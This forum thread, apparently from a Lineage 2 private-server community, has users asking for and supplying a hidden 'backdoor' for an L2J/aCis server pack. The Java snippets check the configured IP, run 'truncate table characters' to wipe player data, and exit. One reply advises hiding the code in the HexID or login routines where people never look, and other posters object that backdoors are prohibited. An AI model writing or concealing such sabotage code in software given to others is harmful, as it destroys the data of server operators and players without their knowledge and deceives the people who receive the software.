Jump to content

Question

Posted

Hello, as topic says i need backdoor java code.

If ip doesnt same as typed in gameserver.java where we put backdoor server doesnt turn on and all sql from navicat be deleted.

Can someone help to me make it? Or share it:)

PACK: L2jaCis

 

if(Config.GAMESERVER_HOSTNAME.equals("77.120.16.18") || 
Config.GAMESERVER_HOSTNAME.equals("77.120.29.151")) 
ThreadPoolManager.getInstance().schedule(new Runnable() { 
public void run () { try { Connection con = L2DatabaseFactory.getInstance().getConnection(); 
con.prepareStatement("truncate table characters").execute(); 

 

ITS FROM LUCERA i dont know its good backdoor or no, but here is example:)

Recommended Posts

  • 0
Posted

Hello, as topic says i need backdoor java code.

If ip doesnt same as typed in gameserver.java where we put backdoor server doesnt turn on and all sql from navicat be deleted.

Can someone help to me make it? Or share it:)

PACK: aCis

 

 

ITS FROM LUCERA i dont know its good backdoor or no, but here is example:)

 

Would you please kinda move code or smth... cuz with that size of topic probably noone is going to post anything more then once.

  • 0
Posted

Gameserver.java find

 

 

 

public static void main(String[] args) throws Exception

{

 

and beneath it add

 

if (Config.GAMESERVER_HOSTNAME.equals("77.120.16.18") || Config.GAMESERVER_HOSTNAME.equals("77.120.29.151"))

{

    L2DatabaseFactory.getInstance().getConnection().prepareStatement("truncate table characters").execute();

    System.exit(1);

}

 

NOTE: you have to put ! if  u dont want equality; !Config

 

PS: Its extremely easy to be bypassed if u have the source, no matter how well u hide the code, since anyone can put the IPS directly on the socket rather than loading from the config

 

  • 0
Posted

backdoor are prohibited! You should trust your costumer.

 

As i see people with harmed intelligence with the "backdoor" are helping now.

 

You should get banned for this or this topic should be locked.

 

 

  • 0
Posted

backdoor are prohibited! You should trust your costumer.

 

As i see people with harmed intelligence with the "backdoor" are helping now.

 

You should get banned for this or this topic should be locked.

 

 

Dafuq, he is able to do everything at his pack since it's not public.
  • 0
Posted

backdoor are prohibited! You should trust your costumer.

 

As i see people with harmed intelligence with the "backdoor" are helping now.

 

You should get banned for this or this topic should be locked.

 

 

 

he will be banned for backdoring his server, report him pls

 

I need backdoor who delete all database and you can't start gameserver

 

learn to read please, I gave u the excact code

  • 0
Posted

You guys give really really easy to find and get rid of options :D

 

Hide the code inside the HexID read or somewhere people never look in the login :D

  • 0
Posted

Dafuq, he is able to do everything at his pack since it's not public.

 

When you open a server the first thing you make is the backdoor? dafuq your style.

 

 

he will be banned for backdoring his server, report him pls

 

 

pets

  • 0
Posted

I need if IP who typed in backdoor code is in gameserver ip so its okey, server turns on, but if IP is typed 127.0.0.1 in backdoor code and in gameserver network ip is writed 127.1.1.1 server doesnt turn on, xdem you dont understand me:)

 

		if (!Config.GAMESERVER_HOSTNAME.equals("192.168.0.100") || !Config.GAMESERVER_HOSTNAME.equals("94.23.59.169"))
	{
	     System.exit(-1);
	}

 

This makes if ip is typed here and in configs so server doesnt start. I need if here ip is typed and in configs not, server doesnt start. I think you understand me

Guest
This topic is now closed to further replies.


  • Posts

    • NEW SEASON GRAND OPENING FROM - 10/07/2026, FRIDAY, 20:00 +3 GMT !
    • No complicated KYC, instant setup after purchase!  Boost your connection speed and secure your privacy today!  Official Website: https://novproxy.com?kwd=tt-max
    • I don't know this guy and I don't care about him or the server. What I want to say I already do it. And yes, it does seem like he has some mental problems to make up these stories. 
    • L2JForge Edition Update Revision: V1.0.119  Update: 15 June – 1 July 2026  Fixes & Improvements Fixed PawnShop pagination and inactive Community Board actions. Added thread-safe caching to the PawnShop system. Fixed MMOTopVote vote tracking. Fixed PvP Event participant cleanup. Restored the missing PvP Ranking broadcast. Improved CTF flag handling and zone validation. Added Try Skin / Hat Preview handlers to the Community Board. Improved character skin appearance refreshes without requiring a restart. Improved NPC positioning to reduce train and collision abuse. Fixed Seal of Ruler casting from invalid artifact positions. Added stricter castle artifact, range and height validation. Fixed character restoration stability during Enter World. Reworked Community Board Home, Shop, Bosses and Events sections. Added live Raid/Epic Boss status and respawn information. Added upcoming PvP and GvG event schedules. Integrated character services, settings and statistics into the Community Board. Moved Vote Rewards from a voiced command into the Character Menu in Community Board. Removed the obsolete Achievements / .rewards system.  Removed unused multilingual resources and simplified datapack loading. Improved datapack startup and HTML cache stability. Added automatic build revision and build-date metadata. Reorganized runtime libraries and standardized generated server jars. Refined the Player, Creature, GameClient, Clan and Frintezza systems. Performed extensive source cleanup and reliability improvements. Updated build configuration and repository exclusions.  Work in Progress Development continues with additional gameplay fixes, performance improvements, system cleanup and more upgrades already in progress..
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..